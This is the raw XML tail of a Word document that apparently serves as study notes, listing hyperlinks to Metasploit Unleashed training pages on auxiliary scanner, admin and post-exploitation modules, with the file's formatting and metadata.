          <w:t>https://www.offensive-security.com/metasploit-unleashed/multiple-os-post-general-modules/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7DCE3B55" w14:textId="08EE739B" w:rsidR="00CF0B91" w:rsidRDefault="00CF0B91" w:rsidP="00CF0B91">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>AUXILIARY MODULE REFERENCE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ED5C44B" w14:textId="7E0FC9BC" w:rsidR="00CF0B91" w:rsidRDefault="00CF0B91" w:rsidP="00CF0B91">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>ADMIN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EBB2C41" w14:textId="1861E038" w:rsidR="00CF0B91" w:rsidRDefault="0005276B" w:rsidP="00CF0B91">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId19" w:history="1">
        <w:r w:rsidR="00CF0B91" w:rsidRPr="003935AB">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.offensive-security.com/metasploit-unleashed/admin-http-auxiliary-modules/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="48AD546C" w14:textId="06F209D2" w:rsidR="00CF0B91" w:rsidRDefault="0005276B" w:rsidP="00CF0B91">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId20" w:history="1">
        <w:r w:rsidR="00CF0B91" w:rsidRPr="003935AB">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.offensive-security.com/metasploit-unleashed/admin-mssql-auxiliary-modules/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="15932D9E" w14:textId="5D5D0BB2" w:rsidR="00CF0B91" w:rsidRDefault="0005276B" w:rsidP="00CF0B91">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId21" w:history="1">
        <w:r w:rsidR="00CF0B91" w:rsidRPr="003935AB">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.offensive-security.com/metasploit-unleashed/admin-mysql-auxiliary-modules/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4188387F" w14:textId="73CC7808" w:rsidR="00CF0B91" w:rsidRDefault="0005276B" w:rsidP="00CF0B91">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId22" w:history="1">
        <w:r w:rsidR="00CF0B91" w:rsidRPr="003935AB">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.offensive-security.com/metasploit-unleashed/admin-postgres-auxiliary-modules/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3185FEAE" w14:textId="382A5A18" w:rsidR="00CF0B91" w:rsidRDefault="0005276B" w:rsidP="00CF0B91">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId23" w:history="1">
        <w:r w:rsidR="00CF0B91" w:rsidRPr="003935AB">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.offensive-security.com/metasploit-unleashed/admin-vmware-auxiliary-modules/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="66A61163" w14:textId="7339CB08" w:rsidR="00CF0B91" w:rsidRDefault="00CF0B91" w:rsidP="00CF0B91">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>SCANNER</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B2EE839" w14:textId="5119DECE" w:rsidR="00CF0B91" w:rsidRDefault="0005276B" w:rsidP="00CF0B91">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId24" w:history="1">
        <w:r w:rsidR="00CF0B91" w:rsidRPr="003935AB">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.offensive-security.com/metasploit-unleashed/scanner-dcerpc-auxiliary-modules/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0E8D00A6" w14:textId="344F7AFB" w:rsidR="00CF0B91" w:rsidRDefault="0005276B" w:rsidP="00CF0B91">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId25" w:history="1">
        <w:r w:rsidR="00CF0B91" w:rsidRPr="003935AB">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.offensive-security.com/metasploit-unleashed/scanner-discovery-auxiliary-modules/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5C009FD6" w14:textId="00157FE4" w:rsidR="00CF0B91" w:rsidRDefault="0005276B" w:rsidP="00CF0B91">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId26" w:history="1">
        <w:r w:rsidR="00CF0B91" w:rsidRPr="003935AB">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.offensive-security.com/metasploit-unleashed/scanner-ftp-auxiliary-modules/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6616C9C2" w14:textId="18E5CC9E" w:rsidR="00CF0B91" w:rsidRDefault="0005276B" w:rsidP="00CF0B91">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId27" w:history="1">
        <w:r w:rsidR="00CF0B91" w:rsidRPr="003935AB">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.offensive-security.com/metasploit-unleashed/scanner-http-auxiliary-modules/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="216C3CE6" w14:textId="08117223" w:rsidR="00CF0B91" w:rsidRDefault="0005276B" w:rsidP="00CF0B91">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId28" w:history="1">
        <w:r w:rsidR="00CF0B91" w:rsidRPr="003935AB">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.offensive-security.com/metasploit-unleashed/scanner-imap-auxiliary-modules/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5958A877" w14:textId="50639173" w:rsidR="00CF0B91" w:rsidRDefault="0005276B" w:rsidP="00CF0B91">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId29" w:history="1">
        <w:r w:rsidR="00CF0B91" w:rsidRPr="003935AB">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.offensive-security.com/metasploit-unleashed/scanner-mssql-auxiliary-modules/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="41327C64" w14:textId="7A6F25FD" w:rsidR="00CF0B91" w:rsidRDefault="0005276B" w:rsidP="00CF0B91">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId30" w:history="1">
        <w:r w:rsidR="00CF0B91" w:rsidRPr="003935AB">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.offensive-security.com/metasploit-unleashed/scanner-mysql-auxiliary-modules/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6ED7E9CA" w14:textId="5F3E57E3" w:rsidR="00CF0B91" w:rsidRDefault="0005276B" w:rsidP="00CF0B91">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId31" w:history="1">
        <w:r w:rsidR="00CF0B91" w:rsidRPr="003935AB">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.offensive-security.com/metasploit-unleashed/scanner-netbios-auxiliary-modules/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="43973D56" w14:textId="1F2971D4" w:rsidR="00CF0B91" w:rsidRDefault="0005276B" w:rsidP="00CF0B91">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId32" w:history="1">
        <w:r w:rsidR="00CF0B91" w:rsidRPr="003935AB">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.offensive-security.com/metasploit-unleashed/scanner-pop3-auxiliary-modules/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="66CC397A" w14:textId="6A3B96E1" w:rsidR="00CF0B91" w:rsidRDefault="0005276B" w:rsidP="00CF0B91">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId33" w:history="1">
        <w:r w:rsidR="00CF0B91" w:rsidRPr="003935AB">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.offensive-security.com/metasploit-unleashed/scanner-smb-auxiliary-modules/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="543F1782" w14:textId="402CF58E" w:rsidR="00CF0B91" w:rsidRDefault="0005276B" w:rsidP="00CF0B91">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId34" w:history="1">
        <w:r w:rsidR="00CF0B91" w:rsidRPr="003935AB">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.offensive-security.com/metasploit-unleashed/scanner-smtp-auxiliary-modules/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="114ABDA0" w14:textId="1A1FA835" w:rsidR="00CF0B91" w:rsidRDefault="0005276B" w:rsidP="00CF0B91">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId35" w:history="1">
        <w:r w:rsidR="00CF0B91" w:rsidRPr="003935AB">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.offensive-security.com/metasploit-unleashed/scanner-snmp-auxiliary-modules/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4017C562" w14:textId="09A2A6F7" w:rsidR="00CF0B91" w:rsidRDefault="0005276B" w:rsidP="00CF0B91">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId36" w:history="1">
        <w:r w:rsidR="00CF0B91" w:rsidRPr="003935AB">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.offensive-security.com/metasploit-unleashed/scanner-ssh-auxiliary-modules/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="56860F95" w14:textId="450D8856" w:rsidR="00CF0B91" w:rsidRDefault="0005276B" w:rsidP="00CF0B91">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId37" w:history="1">
        <w:r w:rsidR="00E75A78" w:rsidRPr="003935AB">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.offensive-security.com/metasploit-unleashed/scanner-telnet-auxiliary-modules/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="248EF070" w14:textId="23BDDAE4" w:rsidR="00E75A78" w:rsidRDefault="0005276B" w:rsidP="00CF0B91">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId38" w:history="1">
        <w:r w:rsidR="00E75A78" w:rsidRPr="003935AB">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.offensive-security.com/metasploit-unleashed/scanner-tftp-auxiliary-modules/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="796FAA1A" w14:textId="4E7BF016" w:rsidR="00E75A78" w:rsidRDefault="0005276B" w:rsidP="00CF0B91">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId39" w:history="1">
        <w:r w:rsidR="00E75A78" w:rsidRPr="003935AB">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.offensive-security.com/metasploit-unleashed/scanner-vmware-auxiliary-modules/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1C7E7D7D" w14:textId="65DB68AD" w:rsidR="00E75A78" w:rsidRDefault="0005276B" w:rsidP="00CF0B91">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId40" w:history="1">
        <w:r w:rsidR="00E75A78" w:rsidRPr="003935AB">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.offensive-security.com/metasploit-unleashed/scanner-vnc-auxiliary-modules/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="19C3CE7A" w14:textId="09259464" w:rsidR="00E75A78" w:rsidRDefault="00E75A78" w:rsidP="00E75A78">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>SERVER</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01BA73CF" w14:textId="45DBBAB4" w:rsidR="00E75A78" w:rsidRDefault="0005276B" w:rsidP="00E75A78">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId41" w:history="1">
        <w:r w:rsidR="00E75A78" w:rsidRPr="003935AB">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.offensive-security.com/metasploit-unleashed/server-capture-auxiliary-modules/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="26796F27" w14:textId="58D4D1E5" w:rsidR="00E75A78" w:rsidRDefault="00E75A78" w:rsidP="00E75A78">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>RECENT CHANGES TO METASPLOIT UNLEASHED</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77851C60" w14:textId="1283ACC4" w:rsidR="00E75A78" w:rsidRDefault="0005276B" w:rsidP="00E75A78">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId42" w:history="1">
        <w:r w:rsidR="00E75A78" w:rsidRPr="003935AB">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.offensive-security.com/metasploit-unleashed/recent-changes/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="05D453FE" w14:textId="20B3C5A0" w:rsidR="00E75A78" w:rsidRDefault="00E75A78" w:rsidP="00E75A78">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2793BEB0" w14:textId="60B73514" w:rsidR="00E75A78" w:rsidRDefault="00E75A78" w:rsidP="00E75A78">
      <w:r>
        <w:t>END</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00E75A78" w:rsidSect="00F512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149C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="AB42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F9"/>
    <w:rsid w:val="00001EF9"/>
    <w:rsid w:val="0005276B"/>
    <w:rsid w:val="000B3295"/>
    <w:rsid w:val="000F5995"/>
    <w:rsid w:val="001030C6"/>
    <w:rsid w:val="00151E6C"/>
    <w:rsid w:val="0015358A"/>
    <w:rsid w:val="001625BE"/>
    <w:rsid w:val="00177B31"/>
    <w:rsid w:val="0022663E"/>
    <w:rsid w:val="002F7C93"/>
    <w:rsid w:val="0033735D"/>
    <w:rsid w:val="0034558D"/>
    <w:rsid w:val="003F0EE1"/>
    <w:rsid w:val="003F7CB3"/>
    <w:rsid w:val="00417F63"/>
    <w:rsid w:val="00425B0D"/>
    <w:rsid w:val="00447048"/>
    <w:rsid w:val="00453967"/>
    <w:rsid w:val="004626D6"/>
    <w:rsid w:val="0048474E"/>
    <w:rsid w:val="004B2BD1"/>
    <w:rsid w:val="004B7359"/>
    <w:rsid w:val="00603A74"/>
    <w:rsid w:val="00604950"/>
    <w:rsid w:val="006579F6"/>
    <w:rsid w:val="0066600F"/>
    <w:rsid w:val="006738C8"/>
    <w:rsid w:val="006A0923"/>
    <w:rsid w:val="006D0073"/>
    <w:rsid w:val="006E7E8E"/>
    <w:rsid w:val="00737F88"/>
    <w:rsid w:val="00740101"/>
    <w:rsid w:val="00753AEF"/>
    <w:rsid w:val="00771977"/>
    <w:rsid w:val="00847D6E"/>
    <w:rsid w:val="008C62BE"/>
    <w:rsid w:val="008D7AEB"/>
    <w:rsid w:val="00916107"/>
    <w:rsid w:val="00975DDB"/>
    <w:rsid w:val="009D73EF"/>
    <w:rsid w:val="00A22B39"/>
    <w:rsid w:val="00A75B67"/>
    <w:rsid w:val="00A90467"/>
    <w:rsid w:val="00AD6A24"/>
    <w:rsid w:val="00B21F2A"/>
    <w:rsid w:val="00B3529D"/>
    <w:rsid w:val="00BC2EEA"/>
    <w:rsid w:val="00BD1426"/>
    <w:rsid w:val="00BD1DFE"/>
    <w:rsid w:val="00C22447"/>
    <w:rsid w:val="00C26B4C"/>
    <w:rsid w:val="00CB5036"/>
    <w:rsid w:val="00CD2B2D"/>
    <w:rsid w:val="00CE17FE"/>
    <w:rsid w:val="00CF0B91"/>
    <w:rsid w:val="00D43202"/>
    <w:rsid w:val="00D46F20"/>
    <w:rsid w:val="00D658D3"/>
    <w:rsid w:val="00D95715"/>
    <w:rsid w:val="00DB7019"/>
    <w:rsid w:val="00DD0AFE"/>
    <w:rsid w:val="00DF0BAF"/>
    <w:rsid w:val="00E21954"/>
    <w:rsid w:val="00E33426"/>
    <w:rsid w:val="00E75A78"/>
    <w:rsid w:val="00F264D7"/>
    <w:rsid w:val="00F51289"/>
    <w:rsid w:val="00F6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DF50"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{08A492F5-4FEB-4AEE-AED3-A4BD437E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ffensive-security.com/metasploit-unleashed/karmetasploit-action/" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.offensive-security.com/metasploit-unleashed/windows-post-gather-modules/" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.offensive-security.com/metasploit-unleashed/multiple-os-post-general-modules/" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.offensive-security.com/metasploit-unleashed/scanner-ftp-auxiliary-modules/" TargetMode="External"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.offensive-security.com/metasploit-unleashed/scanner-vmware-auxiliary-modul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ffensive-security.com/metasploit-unleashed/admin-mysql-auxiliary-modules/" TargetMode="External"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.offensive-security.com/metasploit-unleashed/scanner-smtp-auxiliary-modules/" TargetMode="External"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.offensive-security.com/metasploit-unleashed/recent-changes/" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://securitytube.net/Ubuntu-Package-Backdoor-using-a-Metasploit-Payload-video.aspx" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.offensive-security.com/metasploit-unleashed/windows-post-capture-modules/" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.offensive-security.com/metasploit-unleashed/multiple-os-post-gather-modules/" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.offensive-security.com/metasploit-unleashed/scanner-discovery-auxiliary-modules/" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.offensive-security.com/metasploit-unleashed/scanner-smb-auxiliary-modules/" TargetMode="External"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.offensive-security.com/metasploit-unleashed/scanner-tftp-auxiliary-modu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ffensive-security.com/metasploit-unleashed/os-post-gather-modules/" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.offensive-security.com/metasploit-unleashed/admin-mssql-auxiliary-modules/" TargetMode="External"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.offensive-security.com/metasploit-unleashed/scanner-mssql-auxiliary-modules/" TargetMode="External"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.offensive-security.com/metasploit-unleashed/server-capture-auxiliary-modul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ubydoc.info/github/rapid7/metasploit-framework/Rex/Text" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://127.0.0.1:8834" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.offensive-security.com/metasploit-unleashed/scanner-dcerpc-auxiliary-modules/" TargetMode="External"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.offensive-security.com/metasploit-unleashed/scanner-pop3-auxiliary-modules/" TargetMode="External"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.offensive-security.com/metasploit-unleashed/scanner-telnet-auxiliary-modules/" TargetMode="External"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.offensive-security.com/metasploit-unleashed/scanner-vnc-auxiliary-modules/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.microsoft.com/en-us/microsoft-edge/tools/vms/" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.offensive-security.com/metasploit-unleashed/linux-post-gather-modules/" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.offensive-security.com/metasploit-unleashed/admin-vmware-auxiliary-modules/" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.offensive-security.com/metasploit-unleashed/scanner-imap-auxiliary-modules/" TargetMode="External"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.offensive-security.com/metasploit-unleashed/scanner-ssh-auxiliary-modules/" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:3790" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.offensive-security.com/metasploit-unleashed/admin-http-auxiliary-modules/" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.offensive-security.com/metasploit-unleashed/scanner-netbios-auxiliary-modules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offensive-security.com/metasploit-unleashed/karmetasploit-attack-analysis/" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.offensive-security.com/metasploit-unleashed/windows-post-manage-modules/" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.offensive-security.com/metasploit-unleashed/admin-postgres-auxiliary-modules/" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.offensive-security.com/metasploit-unleashed/scanner-http-auxiliary-modules/" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.offensive-security.com/metasploit-unleashed/scanner-mysql-auxiliary-modules/" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.offensive-security.com/metasploit-unleashed/scanner-snmp-auxiliary-modules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22</Pages>
  <Words>5315</Words>
  <Characters>30300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Armstrong</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Nicholas Armstrong</cp:lastModifiedBy>
  <cp:revision>12</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-05-10T23:27:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-10-03T16:47:00Z</dcterms:modified>
</cp:coreProperties>
</file>